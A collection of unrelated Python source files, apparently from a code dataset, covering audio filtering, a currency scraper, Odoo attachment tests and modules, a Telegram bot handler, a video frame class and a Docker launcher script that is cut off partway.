data = wf.readframes(wf.getnframes())
    #convert to normalized float values in [-1, 1)
data = numpy.frombuffer(data, dtype="int16") / 32768.0
wf.close()
return {"data":data, "fs":fs, "N":N}
```
#### File: libs/other/wav_lib_sample_007.py
```python
import struct
import wave
import numpy as np
import scipy.signal
from pylab import *
"""SciPyのFIRフィルタ関数を使うサンプル"""
def fft(b, y, fs):
"""フィルタ係数bとフィルタされた信号yのFFTを求める"""
b = list(b)
y = list(y)
    N = 512 # number of FFT samples
    # pad with 0.0 because at least N points are needed for the FFT
for i in range(N):
b.append(0.0)
y.append(0.0)
    # FFT of the filter coefficients
B = np.fft.fft(b[0:N])
freqList = np.fft.fftfreq(N, d=1.0/fs)
    spectrum = [np.sqrt(c.real ** 2 + c.imag ** 2) for c in B]
    # filter coefficients in the time domain
subplot(221)
plot(range(0, N), b[0:N])
axis([0, N, -0.5, 0.5])
xlabel("time [sample]")
ylabel("amplitude")
    # filter coefficients in the frequency domain
    subplot(223)
    n = len(freqList) // 2
plot(freqList[:n], spectrum[:n], linestyle='-')
axis([0, fs/2, 0, 1.2])
xlabel("frequency [Hz]")
ylabel("spectrum")
    # FFT of the filtered waveform
    Y = np.fft.fft(y[0:N])
    freqList = np.fft.fftfreq(N, d=1.0/fs)
    spectrum = [np.sqrt(c.real ** 2 + c.imag ** 2) for c in Y]
print(freqList)
    # plot the waveform
subplot(222)
plot(range(0, N), y[0:N])
axis([0, N, -1.0, 1.0])
xlabel("time [sample]")
ylabel("amplitude")
    # plot the amplitude spectrum
    subplot(224)
    n = len(freqList) // 2
plot(freqList[:n], spectrum[:n], linestyle='-')
axis([0, fs/2, 0, 10])
xlabel("frequency [Hz]")
ylabel("spectrum")
show()
def save(data, fs, bit, filename):
"""波形データをWAVEファイルへ出力"""
wf = wave.open(filename, "w")
wf.setnchannels(2)
wf.setsampwidth(2)
    wf.setframerate(fs)
wf.writeframes(data)
wf.close()
if __name__ == '__main__':
wf = wave.open("sample.wav", "r")
fs = wf.getframerate()
x = wf.readframes(wf.getnframes())
x = frombuffer(x, dtype="int16") / 32768.0
    nyq = fs / 2.0 # Nyquist frequency
    # Filter design
    # normalize so that the Nyquist frequency becomes 1
    fe1 = 50.0 / nyq # cutoff frequency 1
    fe2 = 3000.0 / nyq # cutoff frequency 2
    numtaps = 255 # number of filter coefficients (taps); must be odd
b = scipy.signal.firwin(numtaps, fe1) # Low-pass
#b = scipy.signal.firwin(numtaps, fe2, pass_zero=False) # High-pass
# b = scipy.signal.firwin(numtaps, [fe1, fe2], pass_zero=False) # Band-pass
# b = scipy.signal.firwin(numtaps, [fe1, fe2]) # Band-stop
    # apply the FIR filter
y = scipy.signal.lfilter(b, 1, x)
    # look at the FFT of the filter coefficients and the filtered signal
fft(b, y, fs)
    # convert back to audio binary and save
y = [int(v * 32767.0) for v in y]
y = struct.pack("h" * len(y), *y)
save(y, fs, 16, "sine2.wav")
```
#### File: HighResolution/src/makeAmpCSV.py
```python
import numpy as np
import audioread as ar
import math
import sys, time
#File names
wavName_hi = "../wav/02-Are You Real.wav"
wavName_cd = "../wav/02-Are You Real_CD.wav"
csvName_hi = "../result_hi.csv"
csvName_cd = "../result_cd.csv"
#Number of amplitude values to extract
N = 20
#Reference: http://wrist.hatenablog.com/entry/2013/08/06/015240
def pcm2float(short_ndary):
float_ndary = np.array(short_ndary, dtype=np.float64)
return np.where(float_ndary > 0.0, float_ndary / 32767.0, float_ndary / 32768.0)
#Given a file name, return the WAV file's sampling rate and amplitude values as a dict
def read_wav_cd(wavName,begin,end) :
wav_bary = bytearray()
with ar.audio_open(wavName) as f:
if f.duration*f.samplerate < end-begin:
print("サンプル数が音声信号の長さを超えています。")
exit()
print("ファイル名 : ",wavName,"\nチャネル数: {0}[channel] \nサンプリング周波数 : {1}[Hz]\nフレーム数 : {2}"
.format(f.channels, f.samplerate, f.duration*f.samplerate))
# "block_samples"で指定されたチャンクサイズずつ処理する(デフォルト1024)
for buf in f:
wav_bary.extend(buf)
    wav_ary = np.frombuffer(wav_bary, dtype=np.int16) # always read as 16-bit
wav_l = wav_ary[0::2]
wav_r = wav_ary[1::2]
#print(wav_l.shape)
#print(wav_r.shape)
    # convert short to float64
    wav_float_l = pcm2float(wav_l[begin:end]) #memory error if the array is too large
wav_float_r = pcm2float(wav_r[begin:end])
    #plot part of the loaded waveform
#import pylab as pl
#pl.plot(wav_float_l[begin:end])
#pl.show()
return {"amp_l":wav_float_l, "amp_r":wav_float_r}
#Write amplitude values for the specified number of frames to a CSV file
def makeAmpCSV(wavData,csvName,begin,end):
    amps = [[]] #dynamically allocate a 2D array
result = ""
    #get the amplitude values within the specified frame range
i = begin
while i < end :
#numAmp分だけ振幅値を抽出
for j in range(i,i+N) :
amps.append(wavData[j])
#最後の列にはカンマを付けない
if j == i+N-1 :
result += repr(wavData[j])
else :
result += repr(wavData[j])+','
result += '\n'
i += N
    #store in a CSV file
try :
f = open(csvName,'w')
f.write(result)
f.close()
except :
print("CSVファイルの出力中にエラーが発生しました。")
exit()
return amps
#Write amplitude values for the specified number of frames to a CSV file - CD version
def makeAmpCSV2(wavData,csvName,begin,end):
result = ""
    #get the amplitude values within the specified frame range
i = begin
while i < end :
        #extract numAmp amplitude values
for j in range(i,i+N,2) :
result += repr(wavData[j])+','
result += repr(wavData[j])
            #do not add a comma after the last column
if j != i+N-2 :
result += ','
result += '\n'
i += N
    #store in a CSV file
try :
f = open(csvName,'w')
f.write(result)
f.close()
except :
print("CSVファイルの出力中にエラーが発生しました。")
exit()
def makeAmpArrayHi(wavData,begin,end) :
    #dummy data for numpy insert
dummy_data = np.zeros(N)
array = np.array([dummy_data],dtype=float)
tmp_array = np.array([],dtype=float)
    #get the amplitude values within the specified frame range
    i = 1 #first frame to process
    n = 1 #index into the result array
    m = 0 #index into the array holding N amplitude values
current = 0
while i < end - N :
        #extract N values from the array
for j in range(i,i+N) :
tmp_array = np.insert(tmp_array, m, wavData[j])
m += 1
        #append the extracted data
array = np.insert(array,n,tmp_array,axis=0)
        #reset the working variables
tmp_array = np.array([],dtype=float)
i += N
n += 1
m = 0
        #display progress
nextP = math.floor(i/end*100)
if nextP > current :
sys.stdout.write("\r%s" % str(nextP)+"% ")
sys.stdout.flush()
time.sleep(0.01)
current = nextP
sys.stdout.write("\r%s" % str(100)+"% ")
print("\n作成完了\n")
return array
def makeAmpArrayCD(wavData,begin,end) :
    #dummy data for numpy insert
dummy_data = np.zeros(N)
array = np.array([dummy_data],dtype=float)
tmp_array = np.array([],dtype=float)
    #get the amplitude values within the specified frame range
    i = 1 #first frame to process
    n = 1 #index into the result array
    m = 0 #index into the array holding N amplitude values
current = 0
while i < end - N :
        #extract N values from the array
for j in range(i,i+N,2) :
tmp_array = np.insert(tmp_array, m, wavData[j])
m += 1
tmp_array = np.insert(tmp_array, m, wavData[j])
m += 1
        #append the extracted data
array = np.insert(array,n,tmp_array,axis=0)
        #reset the working variables
tmp_array = np.array([],dtype=float)
i += N
n += 1
m = 0
        #display progress
nextP = math.floor(i/end*100)
if nextP > current :
sys.stdout.write("\r%s" % str(nextP)+"% ")
sys.stdout.flush()
time.sleep(0.01)
current = nextP
sys.stdout.write("\r%s" % str(100)+"% ")
print("\n作成完了\n")
return array
if __name__ == '__main__':
    #number of frames to extract
    beginFlame = 0 #fixed
endFlame = 1000000 #10000000
#WAVデータの読み込み
wav_data_hi = read_wav_cd(wavName_hi,beginFlame,endFlame)
#wav_data_cd = read_wav_cd(wavName_cd)
a = makeAmpArrayHi(wav_data_hi['amp_l'], beginFlame, endFlame)
b = makeAmpArrayCD(wav_data_hi['amp_l'], beginFlame, endFlame)
    #Output the CSV files
#makeAmpCSV(wav_data_hi['amp_l'], csvName_hi,beginFlame,endFlame)
    #For now, build the pseudo-CD feature vectors from the hi-res source
#makeAmpCSV2(wav_data_hi['amp_l'], csvName_cd,beginFlame,endFlame)
#print("CSVファイルを出力しました。")
```
#### File: src/samples/gmm_test.py
```python
import numpy as np
import matplotlib.pyplot as plt
def scale(X):
"""データ行列Xを属性ごとに標準化したデータを返す"""
# 属性の数(=列の数)
col = X.shape[1]
# 属性ごとに平均値と標準偏差を計算
mu = np.mean(X, axis=0)
sigma = np.std(X, axis=0)
# 属性ごとデータを標準化
for i in range(col):
X[:,i] = (X[:,i] - mu[i]) / sigma[i]
return X
# faithful.txtデータをロード
data = np.genfromtxt("faithful.txt")
X_train = scale(data)
N = len(X_train)
# plot the scatter diagram
plt.plot(X_train[:, 0], X_train[:, 1], 'gx')
plt.xlim(-2.5, 2.5)
plt.ylim(-2.5, 2.5)
plt.grid()
plt.show()
``` |
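For reference, `scale` z-scores each column in place; a tiny check with made-up numbers:
```python
# Hypothetical check of the scale() helper above.
import numpy as np

X = np.array([[1.0, 10.0], [2.0, 20.0], [3.0, 30.0]])
Xs = scale(X.copy())                  # scale() mutates its argument, hence the copy
print(np.round(Xs.mean(axis=0), 6))   # ~[0. 0.]
print(np.round(Xs.std(axis=0), 6))    # ~[1. 1.]
```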
{
"source": "0011010000110010/instant_exchange_conventor",
"score": 3
} |
#### File: 0011010000110010/instant_exchange_conventor/instant-exchange-convertor-2.1.py
```python
import re
from requests import get
from datetime import datetime
from time import sleep
from bs4 import BeautifulSoup
now = datetime.now()
time = datetime.strftime(now, "\n%d-%B-%Y\t%H:%M:%S:%f\n")
types = {
"dollar": {
"name": "DOLAR",
"path": "/serbest-piyasa/amerikan-dolari",
"tag": "div",
"class": "market-data",
"regex": "DOLAR(\S+)"
},
"pound": {
"name": "STERLIN/POUND",
"path": "/serbest-piyasa/amerikan-dolari",
"tag": "div",
"class": "market-data",
"regex": "STERLİN(\S+)"
},
"gram_gold": {
"name": "GRAM GOLD",
"path": "/serbest-piyasa/amerikan-dolari",
"tag": "div",
"class": "market-data",
"regex": "ALTIN(\S+)"
},
"euro": {
"name": "EURO",
"path": "/serbest-piyasa/amerikan-dolari",
"tag": "div",
"class": "market-data",
"regex": "EURO(\S+)"
}
}
types_2 = {
"bitcoin": {
"name": "BITCOIN",
"path": "/kripto-paralar/bitcoin",
"tag": "ul",
"class": "piyasa-ozeti",
"regex": "Bitcoin\s+%\s-?[\d,]+\s+\$?([\d\.,]+)"
}
}
def exc_try():
for typ in types:
exchangeURL = "https://kur.doviz.com" + types[typ]["path"]
r = get(exchangeURL)
soup = BeautifulSoup(r.content, "html.parser")
marketSumForex = soup.find_all("div", {"class": "market-data"})
divs = soup.find_all(types[typ]["tag"], {types[typ]["class"]})
all_texts = divs[-1].text
raw_text = all_texts.replace("\n", "")
value = re.findall(types[typ]["regex"], raw_text)[0]
value_rep = value.replace(".", "").replace(",", ".")
value_last = round(float(value_rep), 2)
print(
f"{decor}\n\tCompared to {types[typ]['name']}\nThe value of it, right now: ₺ {value_last}\n\t\tYou may have {round(amount/(value_last), 4)}")
def btc_try():
# dollar
exchangeURL = "https://kur.doviz.com" + types["dollar"]["path"]
r = get(exchangeURL)
soup = BeautifulSoup(r.content, "html.parser")
marketSumForex = soup.find_all("div", {"class": "market-data"})
divs = soup.find_all(types["dollar"]["tag"], {types["dollar"]["class"]})
all_texts = divs[-1].text
raw_text = all_texts.replace("\n", "")
value = re.findall(types["dollar"]["regex"], raw_text)[0]
value_rep = value.replace(".", "").replace(",", ".")
value_last_dollar = round(float(value_rep), 2)
# bitcoin
exchangeURL = "https://kur.doviz.com" + types_2["bitcoin"]["path"]
r = get(exchangeURL)
soup = BeautifulSoup(r.content, "html.parser")
marketSumForex = soup.find_all("div", {"class": "market-data"})
divs = soup.find_all(types_2["bitcoin"]["tag"], {
types_2["bitcoin"]["class"]})
all_texts = divs[-1].text
raw_text = all_texts.replace("\n", "")
value = re.findall(types_2["bitcoin"]["regex"], raw_text)[-1]
value_rep = value.replace(".", "").replace(",", ".")
value_last_btc = round(float(value_rep), 2)
btc_try = value_last_dollar * value_last_btc
print(
f"{decor}\n\tCompared to {types_2['bitcoin']['name']}\n\t\tYou may have {round(amount/(btc_try), 8)}")
if __name__ == '__main__':
while True:
decor = ("*"*50)
msg = "Welcome to Instant Exchange Convertor".center(50, "*")
exe = input(
f"\n{decor}\n{msg}\n{decor}\nFor starting, type 's'\nFor quitting, type 'q'\nWhat\'s your choice: ")
if exe == "s" or exe == "S":
amount = round(
float(input(f"\nPlease enter an amount (TRY) to invest in: ")), 2)
print(
f"\nThe exact moment right now is; {time}\nYou have '₺ {amount}' for investing.\nAccording to the instant situation of the markets;")
exc_try()
btc_try()
sleep(60)
print("\nRestarting in 10 secs...")
sleep(10)
elif exe == "q" or exe == "Q":
print("\nProgram is shutting down... Open it again whenever you need to.")
sleep(10)
break
else:
print("Type error! Please try again with correct letter;")
exe
``` |
{
"source": "001101/misc-addons",
"score": 2
} |
#### File: ir_attachment_s3/tests/test_resized_attachments.py
```python
import logging
from odoo import api, exceptions
from odoo.tests.common import HttpCase, tagged
_logger = logging.getLogger(__name__)
@tagged("post_install", "-at_install")
class TestResizedAttachments(HttpCase):
def setUp(self):
super(TestResizedAttachments, self).setUp()
self.original_image_url = "https://upload.wikimedia.org/wikipedia/commons/1/1e/Gullfoss%2C_an_iconic_waterfall_of_Iceland.jpg"
def _get_odoo_image_url(self, model, record_id, field):
return "/web/image?model={}&id={}&field={}".format(model, record_id, field)
def test_getting_cached_images_url_instead_computing(self):
env = api.Environment(self.registry.test_cr, self.uid, {})
env["ir.config_parameter"].set_param("ir_attachment_url.storage", "s3")
if not env["ir.attachment"]._get_s3_resource():
self.skipTest("Bad S3 credidentials given")
return
product_tmpl = env["product.template"].create(
{
"name": "Test template",
                # set the image explicitly so it is not computed from the product (it is a 1x1 white pixel)
"image": "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=",
}
)
product_product = env["product.product"].create(
{
"name": "Test product",
"image_variant": self.original_image_url,
"product_tmpl_id": product_tmpl.id,
}
)
odoo_image_url = self._get_odoo_image_url(
"product.product", product_product.id, "image"
)
odoo_image_medium_url = self._get_odoo_image_url(
"product.product", product_product.id, "image_medium"
)
odoo_image_small_url = self._get_odoo_image_url(
"product.product", product_product.id, "image_small"
)
self.authenticate("demo", "demo")
redirected_image = self.url_open(odoo_image_url, timeout=30)
redirected_image_medium = self.url_open(odoo_image_medium_url, timeout=30)
redirected_image_small = self.url_open(odoo_image_small_url, timeout=30)
self.assertEqual(redirected_image.status_code, 200)
self.assertEqual(redirected_image_medium.status_code, 200)
self.assertEqual(redirected_image_small.status_code, 200)
redirected_image_url = redirected_image.url
redirected_image_medium_url = redirected_image_medium.url
redirected_image_small_url = redirected_image_small.url
# Attachments must be created during the execution of requests that are written above.
product_product_image_variant_attachment = env[
"ir.http"
]._find_field_attachment(
env, "product.product", "image_variant", product_product.id
)
product_product_image_attachment = env["ir.http"]._find_field_attachment(
env, "product.product", "image", product_product.id
)
product_product_image_medium_attachment = env["ir.http"]._find_field_attachment(
env, "product.product", "image_medium", product_product.id
)
product_product_image_small_attachment = env["ir.http"]._find_field_attachment(
env, "product.product", "image_small", product_product.id
)
a = set(
product_product_image_variant_attachment.resized_ids.mapped(
"resized_attachment_id"
)
)
b = {
product_product_image_attachment,
product_product_image_medium_attachment,
product_product_image_small_attachment,
}
self.assertFalse(a.difference(b))
self.assertTrue(product_product_image_attachment)
self.assertTrue(product_product_image_medium_attachment)
self.assertTrue(product_product_image_small_attachment)
self.assertEqual(redirected_image_url, product_product_image_attachment.url)
self.assertEqual(
redirected_image_medium_url, product_product_image_medium_attachment.url
)
self.assertEqual(
redirected_image_small_url, product_product_image_small_attachment.url
)
urls = [
self.original_image_url,
redirected_image_url,
redirected_image_medium_url,
redirected_image_small_url,
]
self.assertEqual(len(urls), len(set(urls)), "Duplicates in URLs: %s" % urls)
def test_unlink_resized_attachments_when_parent_unlink(self):
env = api.Environment(self.registry.test_cr, self.uid, {})
ir_att_model = env["ir.attachment"]
ir_att_resized_model = env["ir.attachment.resized"]
original_att = ir_att_model.create({"name": "test att"})
resized_att = ir_att_model.create({"name": "resized test att"})
ir_att_resized = ir_att_resized_model.create(
{"attachment_id": original_att.id, "resized_attachment_id": resized_att.id}
)
self.assertTrue(original_att.unlink())
with self.assertRaises(exceptions.MissingError):
original_att.write({"name": "foo"})
with self.assertRaises(exceptions.MissingError):
ir_att_resized.write({"width": 1})
with self.assertRaises(exceptions.MissingError):
resized_att.write({"name": "bar"})
```
#### File: ir_attachment_url/tests/test_data_get.py
```python
import logging
from odoo.tests.common import HttpCase, tagged
_logger = logging.getLogger(__name__)
@tagged("post_install", "-at_install")
class TestDataGet(HttpCase):
def test_data_get(self):
test_attachment = self.env.ref("ir_attachment_url.test_url_attachment")
self.env["ir.attachment"].search_read(
[("id", "=", test_attachment.id)], ["id", "datas"]
)
def test_open_url(self):
user_demo = self.env.ref("base.user_demo")
url = "/web/image?model=res.users&id={}&field=image_medium".format(user_demo.id)
self.url_open(url)
```
#### File: ir_attachment_url/tests/test_product_tmpl_image.py
```python
import logging
from odoo import api, conf
from odoo.tests.common import HttpCase, tagged
_logger = logging.getLogger(__name__)
@tagged("post_install", "-at_install")
class TestProductTmplImage(HttpCase):
def _get_original_image_url(self, px=1024):
return "https://upload.wikimedia.org/wikipedia/commons/thumb/1/1e/Gullfoss%2C_an_iconic_waterfall_of_Iceland.jpg/{}px-Gullfoss%2C_an_iconic_waterfall_of_Iceland.jpg".format(
px
)
def _get_odoo_image_url(self, model, record_id, field):
return "/web/image?model={}&id={}&field={}".format(model, record_id, field)
def test_getting_product_variant_image_fields_urls(self):
assert (
"ir_attachment_url" in conf.server_wide_modules
), "ir_attachment_url is not in server_wide_modules. Please add it via --load parameter"
env = api.Environment(self.registry.test_cr, self.uid, {})
env["ir.config_parameter"].set_param("ir_attachment_url.storage", "url")
product_tmpl = env["product.template"].create(
{
"name": "Test template",
"image": self._get_original_image_url(1024),
"image_medium": self._get_original_image_url(128),
"image_small": self._get_original_image_url(64),
}
)
product_product = env["product.product"].create(
{
"name": "<NAME>",
"image": False,
"image_medium": False,
"image_small": False,
"product_tmpl_id": product_tmpl.id,
}
)
odoo_image_url = self._get_odoo_image_url(
"product.product", product_product.id, "image"
)
odoo_image_medium_url = self._get_odoo_image_url(
"product.product", product_product.id, "image_medium"
)
odoo_image_small_url = self._get_odoo_image_url(
"product.product", product_product.id, "image_small"
)
product_tmpl_image_attachment = env["ir.http"].find_field_attachment(
env, "product.template", "image", product_tmpl
)
product_tmpl_image_medium_attachment = env["ir.http"].find_field_attachment(
env, "product.template", "image_medium", product_tmpl
)
product_tmpl_image_small_attachment = env["ir.http"].find_field_attachment(
env, "product.template", "image_small", product_tmpl
)
self.assertTrue(product_tmpl_image_attachment)
self.assertTrue(product_tmpl_image_medium_attachment)
self.assertTrue(product_tmpl_image_small_attachment)
self.authenticate("demo", "demo")
self.assertEqual(
self.url_open(odoo_image_url).url, product_tmpl_image_attachment.url
)
self.assertEqual(
self.url_open(odoo_image_medium_url).url,
product_tmpl_image_medium_attachment.url,
)
self.assertEqual(
self.url_open(odoo_image_small_url).url,
product_tmpl_image_small_attachment.url,
)
```
#### File: web_debranding/models/ir_actions.py
```python
from odoo import models
class IrActionsActWindowDebranding(models.Model):
_inherit = "ir.actions.act_window"
def read(self, fields=None, load="_classic_read"):
results = super(IrActionsActWindowDebranding, self).read(
fields=fields, load=load
)
if not fields or "help" in fields:
params = self.env["ir.config_parameter"].get_debranding_parameters()
new_name = params.get("web_debranding.new_name")
for res in results:
if isinstance(res, dict) and res.get("help"):
res["help"] = res["help"].replace("Odoo", new_name)
return results
```
#### File: web_debranding/models/ir_ui_view.py
```python
import logging
from odoo import api, models
from odoo.tools import mute_logger
from .ir_translation import debrand
_logger = logging.getLogger(__name__)
MODULE = "_web_debranding"
class View(models.Model):
_inherit = "ir.ui.view"
def read_combined(self, fields=None):
res = super(View, self).read_combined(fields=fields)
res["arch"] = debrand(self.env, res["arch"], is_code=True)
return res
@api.model
def _create_debranding_views(self):
"""Create UI views that may work only in one Odoo edition"""
# Odoo EE
self._create_view(
"webclient_bootstrap_enterprise_mobile_icon",
"web_enterprise.webclient_bootstrap",
"""
<xpath expr="//link[@rel='icon']" position="replace">
<t t-set="icon" t-value="request and request.env['ir.config_parameter'].get_debranding_parameters().get('web_debranding.icon_url', '')"/>
<t t-if="icon">
<link rel="icon" sizes="192x192" t-att-href="icon" type="image/x-icon"/>
</t>
</xpath>""",
)
# Odoo EE
self._create_view(
"webclient_bootstrap_enterprise_apple_touch_icon",
"web_enterprise.webclient_bootstrap",
"""
<xpath expr="//link[@rel='apple-touch-icon']" position="replace">
<t t-if="icon">
<link rel="apple-touch-icon" t-att-href="icon" type="image/x-icon"/>
</t>
</xpath>""",
)
# Odoo EE
self._create_view(
"webclient_bootstrap_enterprise_windows_phone",
"web_enterprise.webclient_bootstrap",
"""
<xpath expr="//meta[@name='msapplication-TileImage']" position="replace">
<t t-if="icon">
<meta name="msapplication-TileImage" t-att-content="icon"/>
</t>
</xpath>""",
)
@api.model
def _create_view(self, name, inherit_id, arch, noupdate=False, view_type="qweb"):
view = self.env.ref("{}.{}".format(MODULE, name), raise_if_not_found=False)
if view:
try:
view.write({"arch": arch})
view._check_xml()
except Exception:
_logger.warning(
"Cannot update view %s. Delete it.", name, exc_info=True
)
view.unlink()
return
return view.id
try:
with self.env.cr.savepoint(), mute_logger("odoo.models"):
view = self.env["ir.ui.view"].create(
{
"name": name,
"type": view_type,
"arch": arch,
"inherit_id": self.env.ref(
inherit_id, raise_if_not_found=True
).id,
}
)
view._check_xml()
except Exception:
_logger.debug("Cannot create view %s. Cancel.", name, exc_info=True)
return
self.env["ir.model.data"].create(
{
"name": name,
"model": "ir.ui.view",
"module": MODULE,
"res_id": view.id,
"noupdate": noupdate,
}
)
return view.id
```
#### File: web_debranding/models/res_users.py
```python
from odoo import fields, models
class ResUsers(models.Model):
_inherit = "res.users"
odoobot_state = fields.Selection(string="Bot Status")
def is_admin(self):
# By default Python functions starting with _ are considered private methods.
# Private methods (such as _is_admin) cannot be called remotely
return self._is_admin()
``` |
{
"source": "00111/pelegram",
"score": 2
} |
#### File: pelegram/django_pelegram/bot_handler.py
```python
from django.http import JsonResponse
from django.conf import settings
import requests
import re
class Request(object):
def __init__(self, payload):
self.payload = payload
if 'message' in self.payload.keys():
self.data = self.message_request()
elif 'edited_message' in self.payload.keys():
self.data = self.edited_message_request()
elif 'callback_query' in self.payload.keys():
self.data = self.callback_query_request()
def callback_query_request(self):
data = {
'text': self.payload['callback_query']['data'],
'chat_id': self.payload['callback_query']['message']['chat']['id'],
'callback_query_id': self.payload['callback_query']['id'],
'user': self.payload['callback_query']['from']['id'],
'type': 'callback_query',
'testing_request': True if 'testing_request' in self.payload.keys() else False,
'message_id': self.payload['callback_query']['message']['message_id']
}
return data
def message_request(self):
data = {
'text': self.payload['message']['text'],
'chat_id': self.payload['message']['chat']['id'],
'user': self.payload['message']['from']['id'],
'type': 'message',
'testing_request': True if 'testing_request' in self.payload.keys() else False
}
return data
def edited_message_request(self):
data = {
'text': self.payload['edited_message']['text'],
'chat_id': self.payload['edited_message']['chat']['id'],
'user': self.payload['edited_message']['from']['id'],
'type': 'edited_message',
'testing_request': True if 'testing_request' in self.payload.keys() else False
}
return data
class BotBasic(object):
def __init__(self, payload=None, bot_token=None):
self.bot_token = bot_token
self.request = Request(payload)
self.answer = {}
def get_command(self, parse_text=''):
parse_string = self.request.data['text'] if parse_text == '' else parse_text
re_command = re.match(r'^/\w+', parse_string)
command = ""
if re_command:
command = re_command.group().replace('/', '')
return command
def dont_understand_message(self):
return "Bot don't understand your command ¯\_(ツ)_/"
def json_response(self, data, status=200):
return JsonResponse(data, status=status)
def exception_template(self, err):
return "Run-time error:\n{0}\n\nDELETE THIS OUTPUT FROM PRODUCTION!\n".format(err)
def telegram_request(self, method, **kwargs):
telegram_url = "{0}/bot{1}/".format(settings.TELEGRAM_API_URL, self.bot_token)
telegram_response = requests.post(telegram_url + method, **kwargs)
return telegram_response
def answer_on_callback_query(self):
if self.request.data['type'] == 'callback_query':
if 'answer_callback' in self.answer:
answer_callback_query_data = dict(callback_query_id=self.request.data['callback_query_id'],
**self.answer['answer_callback'])
else:
answer_callback_query_data = dict(callback_query_id=self.request.data['callback_query_id'],
text="Bot is typing")
response = self.telegram_request("answerCallbackQuery", data=answer_callback_query_data)
else:
response = None
return response
def send_answer(self):
answer_callback_response = self.answer_on_callback_query()
if answer_callback_response is None:
answer_responses = {}
else:
answer_responses = {"answer_callback": answer_callback_response}
messages_response = []
for message in self.answer['messages']:
response = self.processing_message_action(message)
messages_response.append(response)
answer_responses['messages'] = messages_response
return answer_responses
def processing_message_action(self, message):
handled_message = {'data': {}}
for key in message['data'].keys():
if key == 'file':
                handled_message['files'] = {'photo': open(message['data']['file'], 'rb')}
else:
handled_message['data'][key] = message['data'][key]
send_message_data = dict(chat_id=self.request.data['chat_id'], **handled_message['data'])
if 'files' in handled_message.keys():
response = self.telegram_request(message['action'], data=send_message_data, files=handled_message['files'])
else:
response = self.telegram_request(message['action'], data=send_message_data)
return response
``` |
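A sketch of how `Request` flattens an incoming Telegram update, with the classes above in scope; the payload below is a stripped-down, made-up webhook body and the token is a dummy value:
```python
# Hypothetical Telegram "message" update, reduced to the fields Request reads.
payload = {
    "message": {
        "text": "/start hello",
        "chat": {"id": 42},
        "from": {"id": 42},
    }
}
req = Request(payload)
print(req.data["type"], req.data["chat_id"], req.data["text"])  # message 42 /start hello
bot = BotBasic(payload=payload, bot_token="123:ABC")
print(bot.get_command())                                        # start
```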
{
"source": "001honi/video-processing",
"score": 3
} |
#### File: video-processing/homework-3/video.py
```python
import numpy as np
import cv2
class Video():
FONT = cv2.FONT_HERSHEY_SIMPLEX
BLUE = (255,0,0)
GREEN= (0,255,0)
RED = (0,0,255)
def __init__(self,path):
self.path = path
self.frames_inp = []
self.frames_out = []
self.total_frame = None
self.shape = (None,None) # H,W
def read_frames(self,gray=False,rescale=0):
"""
stores all the frames in the given video source in
self.frames_inp (list) as [frame0, frame1, ...]
where frame# is numpy array
"""
try:
source = cv2.VideoCapture(self.path)
prop = cv2.CAP_PROP_FRAME_COUNT
self.total_frame = int(source.get(prop))
except:
print("Error in Path or Frame Count")
exit()
for i in range(self.total_frame):
ret, frame = source.read()
            if not ret or frame is None:  # stop if the capture failed to return a frame
print("Error in Frame Read")
break
if gray:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if not self.shape[0]:
self.shape = frame.shape[:2]
if rescale:
W = int(self.shape[1] * rescale / 100)
H = int(self.shape[0] * rescale / 100)
frame = cv2.resize(frame, (W,H), interpolation=cv2.INTER_AREA)
self.frames_inp.append(frame)
print("[INFO] Video Import Completed")
def write(self, path="out.avi",fps=30,gray2bgr=False):
H = self.frames_out[0].shape[0]
W = self.frames_out[0].shape[1]
# fourcc = cv2.VideoWriter_fourcc(*"MJPG")
fourcc = -1 # for Windows machines
writer = cv2.VideoWriter(path,fourcc,fps,(W,H),True)
for frame in self.frames_out:
if gray2bgr:
frame = cv2.cvtColor(frame,cv2.COLOR_GRAY2BGR)
writer.write(frame)
print("[INFO] Video Export Completed")
``` |
{
"source": "001zwzwzw/dagar-avoidance",
"score": 2
} |
#### File: dagar-avoidance/docker/run.py
```python
import argparse
import os
import shutil
import subprocess
def main(args):
checkArgs(args)
runGlobalPrerequisites()
workingDir = findWorkingDir(args)
if args.run:
buildContainers(args, workingDir)
runContainers(args, workingDir)
elif args.stop:
stopContainers(workingDir)
elif args.build:
buildContainers(args, workingDir)
elif args.rebuild:
rebuildContainers(args, workingDir)
else:
runContainers(args, workingDir)
def createArgsParser():
parser = argparse.ArgumentParser()
parser.add_argument("planner", help="the planner to start (local | global)")
addRunModes(parser)
addRunCommands(parser)
return parser.parse_args()
def addRunModes(parser):
runMode = parser.add_mutually_exclusive_group()
runMode.add_argument("--sim", help="run in gazebo", action="store_true")
runMode.add_argument("--prod-debug", help="deploy in debug mode, allowing an external machine to connect to the ROS network through VPN (useful for plotting topics in rviz while running on the drone)", action="store_true")
runMode.add_argument("--prod-release", help="deploy in release mode", action="store_true")
def addRunCommands(parser):
runCommands = parser.add_mutually_exclusive_group()
runCommands.add_argument("--run", help="build and run the containers", action="store_true")
runCommands.add_argument("--run-only", help="run the containers (this is the default)", action="store_true")
runCommands.add_argument("--stop", help="stop the containers, if running", action="store_true")
runCommands.add_argument("--build", help="build the containers if necessary (internally running `docker-compose build`)", action="store_true")
runCommands.add_argument("--rebuild", help="rebuild the containers from scratch (internally running `docker-compose build --no-cache`)", action="store_true")
def checkArgs(args):
if args.planner != "local" and args.planner != "global":
print("Planner has to be \"local\" or \"global\"!")
exit(1)
def runGlobalPrerequisites():
while isDockerComposeNotInstalled():
installDockerCompose()
def isDockerComposeNotInstalled():
    return shutil.which("docker-compose") is None  # shutil.which returns None when the executable is not found
def installDockerCompose():
print("You need to install docker-compose in order to run this script. From another terminal, follow these instructions:")
if os.path.exists("/usr/local/bin"):
installPath = "/usr/local/bin"
else:
installPath = "/usr/bin"
sysname = os.uname().sysname
machine = os.uname().machine
remotePath = "https://github.com/docker/compose/releases/download/1.17.0/docker-compose-{}-{}".format(sysname, machine)
curlCommand = "sudo curl -L {} -o {}/docker-compose".format(remotePath, installPath)
print()
print(" 1. Run: $ {}".format(curlCommand))
print(" 2. Run: $ sudo chmod +x {}/docker-compose".format(installPath))
print()
input("When finished, press any key to continue...\n")
def findWorkingDir(args):
if args.prod_release:
return "./{}_planner/{}-planner-prod/{}-planner-prod-release".format(args.planner, args.planner, args.planner)
elif args.prod_debug:
